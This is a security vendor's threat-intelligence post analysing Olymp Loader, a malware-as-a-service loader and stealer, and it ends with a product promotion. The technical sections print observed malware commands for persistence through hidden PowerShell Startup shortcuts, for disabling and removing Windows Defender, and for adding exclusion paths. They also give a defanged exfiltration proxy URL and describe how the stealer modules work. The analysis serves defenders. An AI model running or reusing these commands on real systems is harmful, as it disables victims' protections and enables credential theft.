Resources | Picus Security

Olymp Loader: Emerging Malware-as-a-Service Threat in 2025

Written by Sıla Özeren Hacıoğlu | Nov 25, 2025 8:14:11 AM

A new Malware-as-a-Service (MaaS) threat, Olymp Loader, has emerged on underground forums and Telegram, with its first appearance documented on June 5, 2025. The threat actor, operating under the alias “OLYMPO”, presents the malware as a sophisticated tool, claiming it is "FULLY IN ASSEMBLY" language. This claim, highlighted in their forum advertising banners, is a key marketing tactic to attract a cybercriminal clientele that associates assembly language with low-level, high-performance code that is inherently difficult for security products to detect and for analysts to reverse-engineer.

The seller, who claims to be part of a team with over 10 years of experience in Assembly programming, markets Olymp Loader as FUD (Fully UnDetectable) [1]. This is a central part of their value proposition, with advertisements boasting a 1/72 detection rate on VirusTotal (VT). Despite its recent arrival, the MaaS has already garnered numerous positive reviews from users in the cybercriminal community.

Olymp Loader functions as a multi-purpose threat:

  • It serves as a loader to execute other malware payloads on victim systems.   
  • It acts as a crypter, focusing on anti-analysis and anti-detection features.   
  • It provides built-in stealer modules for browsers, Telegram data, and cryptocurrency wallets.

This combination of features, packaged as an easy-to-use MaaS, lowers the barrier to entry for low- and mid-tier cybercriminals, enabling them to leverage sophisticated evasion techniques and rapidly deploy attacks.

How has Olymp Loader evolved within underground cybercriminal ecosystems?

Forum Presence

Activity has been observed on the following sites under various usernames:

Site            Username            Registration Date
BHF             FullyUnDetectable   June 5, 2025
Lolz Guru       OLYMPO              June 9, 2025
XSS             OLYMPO (banned)     June 5, 2025
Hackforums      OLYMPO              June 5, 2025
DarkForums      OLYMPO              June 6, 2025
Niflheim        OLYMPO              June 6, 2025
"Cardforum[.]cc" OLYMPO              June 26, 2025

A notable "content-marketing" strategy was employed on the top-tier XSS forum. Instead of a direct sales thread, technical articles detailing the loader's inner workings were posted. This unconventional approach was likely intended to build credibility as a malware developer and attract technically skilled members [1].

Project Timeline

5 Jun 2025: First advertisement in HackForums. (This marks the public launch of the project)

2 Jul 2025: UI, botnet features, and shellcode update. (Represents the peak of its expansion as a botnet)

3 Aug 2025: Project restructured. From botnet to dropper. (A fundamental pivot in the malware's architecture and purpose)

30 Aug 2025: Multiservice: stager generator, botnet, file scanner, and crypt. (Shows the project's evolution into a broader service platform)

August 3 Restructuring

A significant pivot was announced on August 3, 2025, detailing a major restructuring that shifted the project from a botnet to a dropper/loader.

An announcement stated [1]:

OLYMP -- Making FUD
❗️ ATTENTION! A complete restructuring of the project will take place next week:
1. The loader no longer has botnet functions.
2. We no longer have a web panel.
3. Your payload is now embedded directly into the stub (via encryption).
4. We are still FUD and still able to upload our builds to VirusTotal.
5. The payload is executed immediately upon launch after Defender disables.
6. We're adding a UAC-Flood module with Defender disabling.
7. Pricing changes.


All previous buyers will receive a one FREE BUILD.


We've been having issues maintaining the panel, so we decided to take this approach. In addition, we've noticed that many buyers used our project primarily to crypt their payloads, so we believe this new approach is the right move.


Thank you for your understanding. 🙏 Please, wait for update...

What distribution vectors are used by Olymp Loader?

Several methods are used to distribute the Olymp Loader.

Two loader binaries were observed hosted as assets within GitHub Releases. The repository, named PurpleOrchid65/Testing, used names like "NodeJs.exe" and a "/NodeJs/" folder path. This suggests a campaign targeting developers attempting to download the Node.js runtime environment from GitHub.

The malware is also distributed using URLs with file names and paths designed to mimic legitimate software. This social engineering technique leverages well-known names to trick users into downloading the malware. Observed lures include PuTTY (SSH client), OpenSSL(cryptographic library), Zoom (video conferencing app), or Classic Offensive (fan-made Counter-Strike mod) [1].

What payloads are delivered by Olymp Loader?

After successful execution, Olymp clients are predominantly observed deploying credential infostealers and remote-access tools. Utilities designed to weaken local defenses are often run first.

The breakdown of delivered payloads is as follows [1]:

  • LummaC2: 46%
  • WebRAT (SalatStealer): 31%
  • QasarRAT: 15%
  • Raccoon: 8%

What are the technical characteristics of Olymp Loader?

The OLYMPO-related products have evolved continuously. Olymp Loader itself has received multiple updates since its first release.

Olymp Loader Samples (June 2025)

The behavior of these early samples can be summarized as follows [1]:

  1. A cmd.exe process is started to run a timeout command.
  2. The binary copies itself to the %AppData% directory. (Other folders, like %Pictures%, were also used in other variants).
  3. The loader is executed from the new location.
  4. A PowerShell script is launched to establish persistence by creating a link in the %StartUp% folder.
  5. Once the new binary runs, it spawns another cmd.exe process, often with a new timeout, and re-executes itself.

The process flow and commands are illustrated below:

Initial Execution: %Desktop%\test.exe

cmd.exe /C "timeout /T 30 >nul && copy /Y "C:\Users\<USER>\Desktop\test.exe" "C:\Users\<USER>\AppData\Roaming\[0-9]{4}.exe" && start "" "C:\Users\<USER>\AppData\Roaming\[0-9]{4}.exe"

Persistence Script:

powershell -ExecutionPolicy Bypass -w hidden -command "$app[0-9]{5}=[Environment]::GetFolderPath([Environment+SpecialFolder]::ApplicationData);Start-Sleep -Seconds 60;$ws = New-Object -ComObject WScript.Shell;$lnk = $ws.CreateShortcut($app[0-9]{5}+ '\Microsoft\Windows\Start Menu\Programs\Startup\[0-9]{4}.lnk');$lnk.TargetPath = '"C:\Users\<USER>\AppData\Roaming\[0-9]{4}.exe"';$lnk.Save()"

Execution from New Location: %AppData%\[0-9]{4}.exe

C:\Windows\SysWOW64\cmd.exe /c "timeout /t 60 /nobreak >nul && start "" "C:\Users\user\AppData\Roaming\[0-9]{4}.exe"

Olymp Loader Samples (August 2025)

Following the August 3 restructuring, botnet functions were removed. The payload was encrypted and integrated directly into the stub, set to execute immediately after Windows Defender was disabled.

The updated behavior is as follows [1]:

Initial Execution: %Desktop%\test.exe

cmd.exe /c "timeout /T 5 >nul && copy /Y "C:\Users\<USER>\Desktop\test.exe" "C:\Users\<USER>\AppData\Roaming\[0-9]{4}.exe" && start "" "C:\Users\<USER>\AppData\Roaming\[0-9]{4}.exe""

Persistence Script:

powershell.exe -w hidden -command "$app3753 = [Environment]::GetFolderPath([Environment+SpecialFolder]::ApplicationData);Start-Sleep -Seconds 60;$ws = New-Object -ComObject WScript.Shell;$lnk = $ws.CreateShortcut($app[0-9]{4} + 'Microsoft\Windows\Start Menu\Programs\Startup\[a-z]{4}.lnk');$lnk.TargetPath = '"C:\Users\<USER>\AppData\Roaming\[0-9]{4}.exe"';$lnk.Save()"

Execution from New Location: %AppData%\[0-9]{4}.exe

This execution triggers a series of PowerShell commands to disable Windows Defender's real-time monitoring and other protections:

powershell.exe powershell -NoProfile -Command "Set-MpPreference -DisableScanningNetworkFiles $true"

powershell.exe powershell -NoProfile -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

powershell.exe powershell -NoProfile -Command "Set-MpPreference -DisableIOAVProtection $true"

powershell.exe powershell -NoProfile -Command "Add-MpPreference -ExclusionPath $env:TEMP"

Subsequently, two executables are dropped into the Temp directory. A series of commands are then run, apparently leveraging the "Defender Remover" tool, which is publicly available on GitHub. This toolset includes PowerRun.exe, various .reg files, and PowerShell scripts to remove Defender components.

cmd.exe /c "C:\Users\<USER>\AppData\Local\Temp\_MEI*\data\PowerRun.exe regedit.exe /s C:\Users\<USER>\AppData\Local\Temp\_MEI*\data\Remove_SecurityComp.reg"

cmd.exe /c "del /f /q C:\Windows\WinSxS\FileMaps\[wow64|amd64]_windows-defender*.manifest"

cmd.exe /c "del /f /q C:\Windows\System32\SecurityHealthSystray.exe"

cmd.exe /c C:\Windows\system32\cmd.exe /c "Powershell -noprofile -executionpolicy bypass -file C:\Users\<USER>\AppData\Local\Temp\_MEI*\data\RemoveSecHealthApp.ps1"

cmd.exe /c "C:\Users\<USER>\AppData\Local\Temp\_MEI*\data\PowerRun.exe regedit.exe /s C:\Users\<USER>\AppData\Local\Temp\_MEI*\data\RemoveDefender.reg"

cmd.exe /c "C:\Users\<USER>\AppData\Local\Temp\_MEI*\data\PowerRun.exe regedit.exe /s C:\Users\<USER>\AppData\Local\Temp\_MEI*\data\RemoveShellAssociation.reg"

This functionality changed again just days later, removing the explicit Defender-disabling commands. Samples from August 10, 2025, instead contained a much longer list of directories to be added to the exclusion list, including %APPDATA%, %LOCALAPPDATA%, %DESKTOP%, %MYDOCUMENTS%, and others.

What are the stealing modules of Olymp Loader?

As of June 23, 2025, three distinct stealing modules were offered as part of the loader's initial advertisement. A common feature across all analyzed modules is an embedded proxy URL used for data exfiltration, located at the end of the binary. The binary searches its own content for a __PROXY__ marker, which is immediately followed by the URL.

__PROXY__http://144.172.97[.]30/index.php

Telegram Stealer Module

This module, internally named tgsteal.py, is written in Python. Its behavior involves [1]:

  1. Querying the registry to find the Telegram executable's folder.
  2. Retrieving the proxy URL from the binary's last bytes.
  3. Taking a screenshot of all monitors.
  4. Killing all running Telegram processes.
  5. Grabbing Telegram data, zipping it with the screenshot, and exfiltrating it. It targets files ending in key_datas or matching the regex .*\\\\D877F7[^\\\\]*?(\\\\maps)?$.

Browser Stealer Module

The browser stealer is written in Python and compiled using "Nuitka". A notable artifact is a DLL named "brsteal.dll" found in the temporary Nuitka directory (%temp%\onefile_). This DLL's name strongly suggests it is the advertised browser stealer module.

Another stealer was identified, written in C++ and containing references to "shaddy43". This username is associated with a GitHub profile that hosts an open-source C++ browser stealer repository. A comparison reveals that the C++ module used by Olymp is based on this open-source BrowserSnatch code but has been modified to include an almost doubled target list [1].

Cryptowallet Stealer Module

This stealer module targets a specific list of desktop cryptowallets, including Exodus, Electrum, Atomic, Guarda, Wasabi, Monero, BitcoinCore, and ZelCore. It also captures a screenshot of all monitors. It is highly probable that this module is also written in Python [1].

How Picus Simulates Olymp Loader Campaign Attacks?

We also strongly suggest simulating Olymp Loader Campaign Attacks to test the effectiveness of your security controls against real-life cyber attacks using the Picus Security Validation Platform. You can also test your defenses against hundreds of other malware variants, such as BRICKSTORM, VenomRAT, Chinotto, and Rustonotto, within minutes with a 14-day free trial of the Picus Platform.

Picus Threat Library includes the following threats for the Olymp Loader Campaign:

Threat ID

Threat Name

Attack Module

68218

Olymp Loader Email Threat

E-mail Infiltration

98173

Olymp Loader Download Threat

Network Infiltration

Start simulating emerging threats today and get actionable mitigation insights with a 14-day free trial of the Picus Security Validation Platform.

Key Takeaways

  • Olymp Loader emerged in June 2025 as a Malware-as-a-Service offering, advertised as fully written in assembly and FUD.

  • It functions as a loader, crypter, and stealer for browsers, Telegram, and cryptocurrency wallets.

  • The threat actor promoted it across multiple underground forums, using technical articles to build credibility.

  • Distribution vectors include disguised downloads on GitHub and URLs mimicking legitimate software.

  • The malware evolved rapidly, pivoting from botnet functionality to a dropper with embedded, encrypted payloads.

  • Post-infection actions focus on disabling Windows Defender, establishing persistence, and delivering RATs and credential stealers.

  • Stealer modules target Telegram data, browser credentials, and desktop cryptocurrency wallets.

References

[1] L. L. Sanz, “Olymp Loader: A new Malware-as-a-Service written in Assembly,” Outpost24. Accessed: Nov. 13, 2025. [Online]. Available: https://outpost24.com/blog/olymp-loader-a-new-malware-as-a-service/
View full post